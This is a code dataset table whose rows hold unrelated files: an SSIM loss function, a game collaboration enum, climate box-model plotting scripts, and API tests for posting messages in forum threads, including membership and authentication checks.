blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ae824878f45449c2a0687abe0de8588bb2fc3290 | 9ec057d901fc9a0828895d28af165884b2eeecd4 | /myapp/test.py | 5b6a3c3ad53cd112178fcbb4108c4d61d0a821f9 | [] | no_license | arpit3018/StockPred | f95706acc9aba53c5bb86fea893c5356d3285d75 | 9c8c195788c8c706e2ec880d59b758e544bd60cf | refs/heads/master | 2022-04-02T19:32:53.119344 | 2020-02-15T01:04:20 | 2020-02-15T01:04:20 | 240,580,862 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | import csv
file1 = "./companylist.csv"
file2 = "./ind_nifty500list.csv"
# Symbol, Name, Sector
with open(file1) as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
print(row["Symbol"], row["Name"], row["Sector"], sep='\t')
with open(file2) as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
print(row["Symbol"], row["Name"], row["Industry"], sep='\t') | [
"rishi.chawla14@gmail.com"
] | rishi.chawla14@gmail.com |
52c45fcb6941676bb95e51b20065f7003e69df4e | 502e97f0ec4f287b8280a546e7f2555ff3a5a1fd | /cnn_3d/loss_ssim.py | 1f9e166d4af572dad02709668df737d66c13e862 | [] | no_license | carlasailer/cnn_ct_pet | d350692be03432e025e33db6296ac33b36bedf08 | 4e256bb73f7ea0ab046c231762001b9f3535bb00 | refs/heads/master | 2020-12-18T23:11:24.048337 | 2020-01-22T10:40:52 | 2020-01-22T10:40:52 | 235,549,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,202 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 25 14:25:02 2019
@author: s1287
"""
import h5py
import os
import keras.backend as K
import numpy as np
def calc_ssim_git(y_true, y_pred):
    """Structural similarity (SSIM) between two tensors via the Keras backend.

    Uses global statistics of each tensor (one window covering the whole
    input) rather than a sliding gaussian window.

    Parameters:
        y_true  ground-truth tensor
        y_pred  predicted tensor

    Returns:
        scalar tensor with the SSIM value, in the range [-1, 1]
    """
    ## K1, K2 are two constants, much smaller than 1
    K1 = 0.04
    K2 = 0.06
    ## mean, std, correlation
    mu_x = K.mean(y_pred)
    mu_y = K.mean(y_true)
    sig_x = K.std(y_pred)
    sig_y = K.std(y_true)
    # NOTE(review): this is the geometric mean of the two standard
    # deviations, not the true covariance sigma_xy of Wang et al.'s SSIM
    # paper -- it over-estimates the structure term for uncorrelated
    # inputs.  Confirm whether that approximation is intended.
    sig_xy = (sig_x * sig_y) ** 0.5
    ## L: dynamic range of the values; C1, C2: stabilising constants
    L = 33
    C1 = (K1 * L) ** 2
    C2 = (K2 * L) ** 2
    # Standard SSIM:
    #   (2*mu_x*mu_y + C1) * (2*sig_xy + C2)
    #   / ((mu_x^2 + mu_y^2 + C1) * (sig_x^2 + sig_y^2 + C2))
    # BUGFIX: the original multiplied the second numerator factor by C2
    # ("2*sig_xy * C2") instead of adding it, which breaks the SSIM
    # identity ssim(x, x) == 1.
    ssim = (2 * mu_x * mu_y + C1) * (2 * sig_xy + C2) * 1.0 / ((mu_x ** 2 + mu_y ** 2 + C1) * (sig_x ** 2 + sig_y ** 2 + C2))
    return ssim
def calc_ssim(y_true, y_pred):
    """Calculates the structured similarity of two images, ssim is in the range [-1,1]

    Computed slice-by-slice along axis 0 of the voxel volumes and then
    averaged over all slices.

    Parameters:
        y_true    voxel used for calculation of SSIM
        y_pred    voxel used for calculation of SSIM
    Returns:
        ssim_value    value of the structured similarity between the two images
    """
    # size = y_true.shape
    # print('The shape is:')
    # print(size)
    single_ssim = []
    try:
        # NOTE(review): compare_ssim is never imported in this file (it
        # presumably comes from skimage.measure.compare_ssim); as written
        # this raises a NameError, which is *not* caught by the
        # IndexError handler below -- confirm the missing import.
        for slice_nr in range(0, y_true.shape[0]):
            # slice_ssim = compare_ssim(y_true[slice_nr,:,:], y_pred[slice_nr,:,:], win_size=3)
            # 3x3 window with gaussian weighting, one SSIM per 2-D slice.
            slice_ssim = compare_ssim(y_true[slice_nr,:,:], y_pred[slice_nr,:,:], win_size=3, gaussian_weights=True)
            single_ssim.append(slice_ssim)
        ssim_mean = np.mean(single_ssim)
    except IndexError:
        # Inputs without a leading slice axis fall back to a "no
        # similarity" score of 0 rather than crashing.
        ssim_mean = 0
    return ssim_mean
#def calc_ssim_multichannel (y_true, y_pred):#
# return compare_ssim(y_true, y_pred, multichannel=True, win_size=3)
def ssim_fct(y_true, y_pred):
    """wrapper function to fit into the Keras framework

    Parameters:
        y_true    ground truth voxel
        y_pred    voxel predicted by network
    Returns:
        ssim    value of the structural similarity, suited as loss function

    NOTE(review): the outer y_true/y_pred parameters are never used --
    they are shadowed by the inner function's own arguments, which Keras
    supplies at call time.
    """
    def ssim(y_true, y_pred):
        # Negated so that maximising similarity minimises the loss.
        # NOTE(review): keras.backend.squeeze requires an explicit axis
        # argument (K.squeeze(x, axis)); calling it with one argument
        # raises a TypeError -- confirm the intended axis (probably the
        # trailing channel axis).
        # NOTE(review): calc_ssim indexes numpy arrays, but inside a
        # Keras loss y_true/y_pred are symbolic tensors -- verify this
        # ever ran as an actual loss function.
        return -calc_ssim(K.squeeze(y_true), K.squeeze(y_pred))
    return ssim
if __name__ == '__main__':
    # Smoke test: load the CT/PET patch volumes and compare two PET
    # patches with the slice-wise SSIM above.
    contents = os.listdir('/home/s1287/no_backup/s1287/results_interp/patches_for_CNN/')
    filename_test = '/home/s1287/no_backup/s1287/results_interp/patches_for_CNN/' + contents[0]
    filename_training = '/home/s1287/no_backup/s1287/results_interp/patches_for_CNN/' + contents[1]
    with h5py.File(filename_training, 'r') as file:
        training_CT = np.array(file.get('CT'))
        training_PET = np.array(file.get('PET'))
    with h5py.File(filename_test, 'r') as file:
        test_CT = np.array(file.get('CT'))
        test_PET = np.array(file.get('PET'))
    # CT volumes are the network input, PET volumes the labels.
    train_data = training_CT
    train_labels = training_PET
    test_data = test_CT
    test_labels = test_PET
    example_PET1 = train_labels[0]
    example_PET2 = train_labels[1]
    current_ssim = calc_ssim(example_PET1, example_PET2)
    print(current_ssim)
    # BUGFIX: the original also called calc_ssim_multichannel(), but that
    # function is commented out above, so the script crashed with a
    # NameError before printing anything.  The call (and its '%d' format
    # specifier, which would have truncated the float SSIM) was removed.
| [
"40063163+carlasailer@users.noreply.github.com"
] | 40063163+carlasailer@users.noreply.github.com |
be4c81a7307446ad3fdd397b5847433df278b5b2 | 638f3cc43b1a7849ec1328207deed72eb9435565 | /pypad/collab.py | f508dd3ad06395335728ce6e7db17f8e899fd2f6 | [
"MIT"
] | permissive | candyninja001/pypad-old | 48444dea7c6037bbad0cae65e50746353b3d816e | 82bfc104c2524ca54cc415d37d2c21fec471838f | refs/heads/master | 2022-02-10T05:44:02.268337 | 2019-06-30T19:54:48 | 2019-06-30T19:54:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | from enum import Enum
from .dev import Dev
class Collab(Enum):
    """Identifier for each Puzzle & Dragons collaboration event.

    Values mirror the collab group ids used by the game data; gaps in
    the numbering (4, 42-43, 53-54, 64, ...) are ids that were never
    observed.  UNKNOWN (-1) is returned for any unrecognised value via
    _missing_ below.
    """
    UNKNOWN = -1
    NONE = 0
    RAGNAROK_ONLINE = 1
    TAIKO_NO_TATSUJIN = 2
    EMIL_CHRONICLE_ONLINE = 3
    GUNMA_NO_YABOU = 5
    CRYSTAL_DEFENDER = 6
    FAMITSU = 7
    PRINCESS_PUNT_SWEET = 8
    ANDROID = 9
    SHINRABANSHO_CHOCO = 10
    CAPYBARA_SAN = 11
    FREAK_TOWER = 12
    SENGOKU_TENKA_TRIGGER = 13
    EVANGELION = 14
    SEVEN_ELEVEN = 15
    CLASH_OF_CLANS = 16
    GROOVE_COASTER = 17
    RAGNAROK_ODYSSEY_ACE = 18
    DRAGONS_DOGMA_QUEST = 19
    TAKAOKA_CITY = 20
    MONSTER_HUNTER_4G = 21
    BATMAN = 22
    THIRTY_ONE_ICECREAM = 23
    ANGRY_BIRDS = 24
    PUZZLE_AND_DRAGONS_Z = 25
    HUNTER_X_HUNTER = 26
    SANRIO_CHARACTERS = 27
    PAD_BATTLE_TOURNAMENT = 28
    BEAMS = 29
    DRAGON_BALL = 30
    SAINT_SEIYA = 31
    ROAD_TO_DRAGON = 32
    DIVINE_GATE = 33
    SUMMONS_BOARD = 34
    PICOTTO_KINGDOM = 35
    BIKKURIMAN = 36
    ANGRY_BIRDS_EPIC = 37
    DC_UNIVERSE = 38
    CHIBI_1 = 39 # first round chibis - three kingdoms series
    FIST_OF_THE_NORTH_STAR = 40
    CHIBI_2 = 41 # second round chibis
    CHIBI_3 = 44 # third round chibis
    FINAL_FANTASY = 45
    GHOST_IN_THE_SHELL = 46
    DUEL_MASTERS = 47
    ATTACK_ON_TITAN = 48
    NINJA_HATTORI_KUN = 49
    SHONEN_SUNDAY = 50
    CROWS_X_WORST = 51 # TODO VERIFY NO OVERLAP WITH VOLTRON
    BLEACH = 52
    ACE_ATTORNEY = 55
    RUROUNI_KENSHIN = 56
    PEPPER = 57
    KINNIKUMAN = 58
    HIRUNE_HIME = 59
    MAGAZINE = 60
    MONSTER_HUNTER = 61
    KAIBUTSU_KUN = 62
    VOLTRON = 63 # TODO VERIFY NO OVERLAP WITH CROW X WORST
    FULLMETAL_ALCHEMIST = 65
    KING_OF_FIGHTERS = 66
    YU_YU_HAKUSHO = 67
    PERSONA = 68
    COCA_COLA = 69
    MAGIC_THE_GATHERING = 70
    CHRONO_MAGIA = 71
    SEVENTH_REBIRTH = 72
    CALCIO_FANTASISTA = 73
    POWER_PROS = 74
    GINTAMA = 75
    SWORD_ART_ONLINE = 76
    KAMEN_RIDER = 77
    YOKAI_WATCH_W = 78
    FATE_STAY_NIGHT = 79
    STREET_FIGHTER_V = 80
    UMAIBOU = 81
    MC_DONALDS = 82
    SHAMAN_KING = 83
    ERROR_999 = 999
    DRAGONBOUNDS_AND_DRAGON_CALLERS = 10001

    @classmethod
    def _missing_(cls, value):
        # Unknown ids are logged (for later addition above) and mapped
        # to UNKNOWN instead of raising ValueError.
        Dev.log(f'Unknown collab: {value}')
        return Collab.UNKNOWN
"candyninja001@gmail.com"
] | candyninja001@gmail.com |
5d1a3254422d9a759a333be1f2834e1071f49c20 | 8fbb7e8f83efbfa98e14b941bf2e687403b02d3d | /week 8/function.py | df77be2210a0e8e46f090171fa964f223f014c7e | [] | no_license | alviandk/python-sunmorn | 0c61f6042dbc3ebf897c2c6139590221c1238b9d | c3a06ba846ddea113cc0c451f110dfc05f256be7 | refs/heads/master | 2016-08-08T15:28:53.078910 | 2015-08-09T04:29:56 | 2015-08-09T04:29:56 | 35,749,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | # function without parameter and return value
# syntax to define a function is "def function_name():"
def say_cool():
    """Print a fixed message; takes no parameters and returns None."""
    # BUGFIX: the original used the Python-2-only statement
    # `print "cooollll"`, which is a SyntaxError under Python 3.  The
    # parenthesised form below behaves identically on both Python 2
    # (print statement with a parenthesised expression) and Python 3
    # (function call).
    print("cooollll")
# syntax to call the function is "function_name()"
say_cool()
| [
"alviandk@GMAIL.COM"
] | alviandk@GMAIL.COM |
67bffd0980d1ea7f4201ae6348603c60f4fb7966 | 42fa1862effc3e494859904b76c43ce2bcd623a0 | /idealised_box_simulations_paper2b.py | 94394f21530d4fa8c134d0b1ed14dcc4aec1a8ec | [] | no_license | PaulHalloran/desktop_python_scripts | 3e83aedf3e232da610b5f7477e4d7e8fb0253f99 | 325e923527278a5c3e9ab8c978f29b2816dab087 | refs/heads/master | 2021-01-01T19:52:06.828997 | 2015-06-27T21:14:10 | 2015-06-27T21:14:10 | 38,155,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,527 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import matplotlib as mpl
results = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/spg_box_model_qump_results_3.csv',delimiter = ',')
results_stg = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/stg_box_model_qump_results_3.csv',delimiter = ',')
forcing_dir = '/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/forcing_data/co2/'
co2_tmp = np.genfromtxt(forcing_dir+'rcp85_1.txt',delimiter = ',')
co2 = np.zeros([co2_tmp.shape[0],4])
co2[:,0] = np.genfromtxt(forcing_dir+'rcp85_1.txt',delimiter = ',')[:,1]
co2[:,1] = np.genfromtxt(forcing_dir+'rcp85_2.txt',delimiter = ',')[:,1]
co2[:,2] = np.genfromtxt(forcing_dir+'rcp85_3.txt',delimiter = ',')[:,1]
rcp85_yr = np.genfromtxt(forcing_dir+'historical_and_rcp85_atm_co2.txt',delimiter = ',')[:,0]
rcp85 = np.genfromtxt(forcing_dir+'historical_and_rcp85_atm_co2.txt',delimiter = ',')[:,1]
mpl.rcdefaults()
font = {'family' : 'monospace',
'weight' : 'bold',
'family' : 'serif',
'size' : 14}
mpl.rc('font', **font)
plt.close('all')
fig, (ax1, ax2) = plt.subplots(1,2,figsize=(10, 4))
leg_lab = ['y = 1.0285**x +c','y = 1.0265**x +c','y = 1.0305**x +c']
for i in range(3):
ax1.plot(co2[:,i],linewidth = 6,alpha= 0.4,label = leg_lab[i])
ax1.legend(loc = 2,prop={'size':10, 'family' : 'normal','weight' : 'bold'},ncol = 1).draw_frame(False)
#ax1.plot(rcp85_yr-1860,rcp85,'k',linewidth = 6,alpha= 0.4)
ax1.set_xlim([0,240])
ax1.set_ylim([200,1800])
ax1.set_ylabel('atm. CO$_2$ (ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
for i in range(3):
ax2.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4)
ax2b = ax2.twinx()
for i in range(3):
ax2b.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--')
leg_lab2 = ['Subpolar N. Atlantic (left axis)','Subtropical/equatorial (right axis)']
tmp = ax2.plot([0,0],'k',linewidth = 6,alpha= 0.4,label = leg_lab2[0])
tmp2 = ax2.plot([0,0],'k',linewidth = 6,alpha= 0.4,linestyle = '--',label = leg_lab2[1])
ax2.legend(loc = 2,prop={'size':10, 'family' : 'normal','weight' : 'bold'},ncol = 1).draw_frame(False)
tmp.pop(0).remove()
tmp2.pop(0).remove()
ax2.set_ylim([10,31])
ax2.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax2.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
ax2.set_xlim([0,240])
#plt.arrow(0,0,0,1, shape='full', lw=3, length_includes_head=True, head_width=.01)
a1 = matplotlib.patches.Arrow(0.5-0.01,0.5+0.01,0.05,0.0, width=0.8,edgecolor='none',facecolor='gray',fill=True,transform=fig.transFigure, figure=fig,alpha=0.25)
fig.lines.extend([a1])
fig.canvas.draw()
plt.tight_layout()
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_1b.png')
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_1b.pdf')
plt.show(block = False)
#plt.close('all')
'''
spg-stg difference plots
'''
#for i in range(4):
# ax1.plot(co2[:,i],linewidth = 6,alpha= 0.4)
#
#ax1.set_ylabel('atm. CO$_2$ (ppm)', multialignment='center',fontweight='bold',fontsize = 14)
#ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
#plt.close('all')
colours = ['b','r']
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
ax1.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '-',color=colours[0])
ax2 = ax1.twinx()
ax2.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--',color=colours[1])
ax1.set_xlim([150,160])
min1 = 22
max1 = 27
min1b = -1
max1b = 4
ax1.set_ylim([min1,max1])
ax2.set_ylim([min1b,max1b])
ax1.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_ylabel('Subtropical atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
plt.tight_layout()
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.png')
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.pdf')
plt.show(block = False)
#plt.close('all')
'''
2
'''
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
ax1.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '-',color=colours[0])
ax1.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--',color=colours[1])
ax1.set_xlim([155,165])
#min1 = 100
#max1 = 160
ax1.set_ylim([min1,max1])
ax1.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_ylabel('Subtropical atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
plt.tight_layout()
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.png')
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.pdf')
plt.show(block = False)
#plt.close('all')
'''
3
'''
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
ax1.plot(results[:,0]-results[0,0],results[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '-',color=colours[0])
ax1.plot(results[:,0]-results[0,0],results_stg[:,i+1],linewidth = 6,alpha= 0.4,linestyle = '--',color=colours[1])
ax1.set_xlim([170,180])
#min1 = 100
#max1 = 160
ax1.set_ylim([min1,max1])
ax1.set_ylabel('atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_ylabel('Subtropical atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
plt.tight_layout()
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.png')
#plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/mechanism_2.pdf')
plt.show(block = False)
#plt.close('all')
# Final figure: the RCP8.5-forced box-model run, spg (solid, left axis)
# vs stg (dashed, right twin axis).  Note this rebinds `results` and
# `results_stg` to the rcp85 files.
results = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/rcp85_spg_box_model_qump_results_3.csv',delimiter = ',')
results_stg = np.genfromtxt('/home/ph290/box_modelling/boxmodel_6_box_back_to_basics/results/rcp85_stg_box_model_qump_results_3.csv',delimiter = ',')
mpl.rcdefaults()
# NOTE(review): duplicate 'family' key again -- 'serif' wins.
font = {'family' : 'monospace',
    'weight' : 'bold',
    'family' : 'serif',
    'size' : 14}
mpl.rc('font', **font)
plt.close('all')
fig, (ax1) = plt.subplots(1,1,figsize=(5, 4))
# Single-member loops (range(1)) -- only column 1 is plotted.
for i in range(1):
    ax1.plot(results[:,0]-results[0,0],results[:,i+1],'k',linewidth = 6,alpha= 0.4)
ax1b = ax1.twinx()
for i in range(1):
    ax1b.plot(results[:,0]-results[0,0],results_stg[:,i+1],'k',linewidth = 6,alpha= 0.4,linestyle = '--')
# NOTE(review): 'dasshed' typo in the published axis label below.
ax1.set_ylabel('spg atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1b.set_ylabel('stg (dasshed) atm. [CO$_2$] minus ocean [CO$_2$]\n(ppm)', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlabel('year', multialignment='center',fontweight='bold',fontsize = 14)
ax1.set_xlim([0,240])
plt.tight_layout()
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/rcp_85.png')
plt.savefig('/home/ph290/Documents/figures/n_atl_paper_II/rcp_85.pdf')
plt.show(block = False)
#plt.close('all')
| [
"paul.halloran@gmail.com"
] | paul.halloran@gmail.com |
c477817d17f893caa0728ca8f24b6d1a92438e18 | 28a05fedfffb11c773c3d4445cea7c525b411443 | /tests/threads/id/messages/createMessages_test.py | e3543f3a9fa8d953acf9f06d222aef3708149f5d | [] | no_license | mdomosla/zadanie2-testy-forum | 9b19740a8dbbced9ce49aeecf453309f96f00e22 | 72d2e82485b6f175d2f0e00a8f366e36a6d19079 | refs/heads/master | 2020-05-25T17:32:26.814582 | 2019-05-22T15:01:44 | 2019-05-22T15:01:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,137 | py | from tests.baseTest import *
from lib.random_generator import RandomGenerator
from lib.api_requests import RequestManager
from grappa import should
from api_endpoints.signup_endpoint import SignupMethods
from api_endpoints.threads_endpoint import ThreadsMethods
from api_endpoints.message_endpoint import MessageMethods
from lib.data_encoder import Encoder
from json.decoder import JSONDecodeError
class CreateMessagesTest(BaseTest):
    """End-to-end tests for posting messages into forum threads.

    Covers message length validation, thread membership rules
    (public/private threads, invitations, kicks) and authentication
    failures.  setUpClass creates one account and one public thread
    shared by all test methods.
    """
    rand = RandomGenerator()
    rm = RequestManager()
    encoder = Encoder()
    auth_header = None
    thread_to_delete = None

    @classmethod
    def setUpClass(cls):
        """Create the shared test account and a public thread owned by it."""
        BaseTest.setUpClass()
        account_data = SignupMethods().create_test_account(generate_fields=True)
        cls.account_id = account_data[1]['response']['id']
        data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
        encoded_credentials = cls.encoder.encode_data(data_to_encode)
        cls.thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
        sample_thread = cls.rand.generate_random_string(10)
        logging.info('Creating user and sample thread for tests')
        result = ThreadsMethods().create_sample_thread(authorization=cls.thread_auth_headers, thread_name=sample_thread,
                                                       private=False)
        cls.thread_id = result['response']['id']
        # Remembered for tearDownClass clean-up.
        cls.thread_to_delete = cls.thread_id
        cls.auth_header = cls.thread_auth_headers

    def setUp(self):
        BaseTest.setUp(self)

    def test_01_create_max_long_message(self):
        """A 300-character message (upper limit) is accepted and echoed back."""
        message = self.rand.generate_random_string(300)
        logging.info('Creating sample message in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(200)
        result['response']['createdAt'] | should.be.a(int)
        result['response']['updatedAt'] | should.be.a(int)
        result['response']['id'] | should.be.a(str)
        result['response']['id'] | should.not_be.none
        result['response']['modelType'] | should.be.equal.to('ThreadMessageModel')
        result['response']['user'] | should.be.a(str)
        result['response']['user'] | should.be.equal.to(self.account_id)
        result['response']['thread'] | should.be.a(str)
        result['response']['thread'] | should.be.equal.to(self.thread_id)
        result['response']['message'] | should.be.a(str)
        result['response']['message'] | should.be.equal.to(message)
        result['response']['deleted'] | should.be.a(bool)
        result['response']['deleted'] | should.be.equal.to(False)

    def test_02_create_min_long_message(self):
        """A 1-character message (lower limit) is accepted and echoed back."""
        message = self.rand.generate_random_string(1)
        logging.info('Creating sample message in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(200)
        result['response']['createdAt'] | should.be.a(int)
        result['response']['updatedAt'] | should.be.a(int)
        result['response']['id'] | should.be.a(str)
        result['response']['id'] | should.not_be.none
        result['response']['modelType'] | should.be.equal.to('ThreadMessageModel')
        result['response']['user'] | should.be.a(str)
        result['response']['user'] | should.be.equal.to(self.account_id)
        result['response']['thread'] | should.be.a(str)
        result['response']['thread'] | should.be.equal.to(self.thread_id)
        result['response']['message'] | should.be.a(str)
        result['response']['message'] | should.be.equal.to(message)
        result['response']['deleted'] | should.be.a(bool)
        result['response']['deleted'] | should.be.equal.to(False)

    def test_03_create_too_short_message(self):
        """An empty message is rejected with a length-validation error."""
        message = ''
        logging.info('Creating sample message in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        # BUGFIX: the original wrote `result['code'] = 422`, *assigning*
        # into the result dict instead of asserting the status code.
        result['code'] | should.be.equal.to(422)
        result['response']['message'].lower() | should.contain('text has to be between 1 and 300 characters')

    def test_04_create_too_long_message(self):
        """A 301-character message is rejected with a length-validation error."""
        message = self.rand.generate_random_string(301)
        logging.info('Creating sample message in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        # BUGFIX: same assignment-instead-of-assertion defect as test_03.
        result['code'] | should.be.equal.to(422)
        result['response']['message'].lower() | should.contain('text has to be between 1 and 300 characters')

    def test_05_create_message_no_message(self):
        """Omitting the message field entirely yields a 409 'text required'."""
        logging.info('Creating sample message without message in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=self.thread_auth_headers)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(409)
        result['response']['message'].lower() | should.contain('text required')

    def test_06_create_message_in_public_thread_as_another_not_invited_user(self):
        """A non-member cannot post even in a public thread (403)."""
        account_data = SignupMethods().create_test_account(generate_fields=True)
        data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
        encoded_credentials = self.encoder.encode_data(data_to_encode)
        thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
        message = self.rand.generate_random_string(50)
        logging.info('Creating sample message as another user in public thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(403)
        result['response']['message'].lower() | should.contain('is not a member of the thread')

    def test_07_create_message_in_private_thread_as_another_not_invited_user(self):
        """A non-member cannot post in a private thread (403)."""
        # A fresh private thread; note this shadows the class-level
        # thread_id on this test instance only.
        sample_thread = self.rand.generate_random_string(10)
        result = ThreadsMethods().create_sample_thread(authorization=self.thread_auth_headers,
                                                       thread_name=sample_thread,
                                                       private=True)
        self.thread_id = result['response']['id']
        account_data = SignupMethods().create_test_account(generate_fields=True)
        data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
        encoded_credentials = self.encoder.encode_data(data_to_encode)
        thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
        message = self.rand.generate_random_string(50)
        logging.info('Creating sample message as another user in private thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(403)
        result['response']['message'].lower() | should.contain('is not a member of the thread')

    def test_08_create_message_by_non_existing_user(self):
        """Garbage credentials are rejected with an 'unauthorized access' body."""
        logging.info('Creating sample message by non existing user in public thread %s' % self.thread_id)
        thread_auth_headers = {'Authorization': 'Basic ' + self.rand.generate_random_string(10)}
        message = self.rand.generate_random_string(50)
        try:
            result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
                                                                           message=message)
            # The server replies with a non-JSON body here, so reaching
            # this line (a parsed result) means the test must fail.
            result | should.be.none
        except JSONDecodeError as e:
            logging.info('Server responded with %s' % e.doc)
            e.doc.lower() | should.contain('unauthorized access')

    def test_09_create_message_by_invited_user(self):
        """Invitation alone is not enough (403); accepting it allows posting (200)."""
        account_data = SignupMethods().create_test_account(generate_fields=True)
        account_id = account_data[1]['response']['id']
        data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
        encoded_credentials = self.encoder.encode_data(data_to_encode)
        thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
        logging.info('Inviting user to thread %s' % self.thread_id)
        result = ThreadsMethods().invite_user_to_thread(authorization=self.thread_auth_headers,
                                                        thread_id=self.thread_id,
                                                        user_id=account_id)
        logging.info('Server returned %s' % result)
        invitation_id = result['response'][0]['id']
        message = self.rand.generate_random_string(50)
        logging.info('Creating sample message as invited user in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
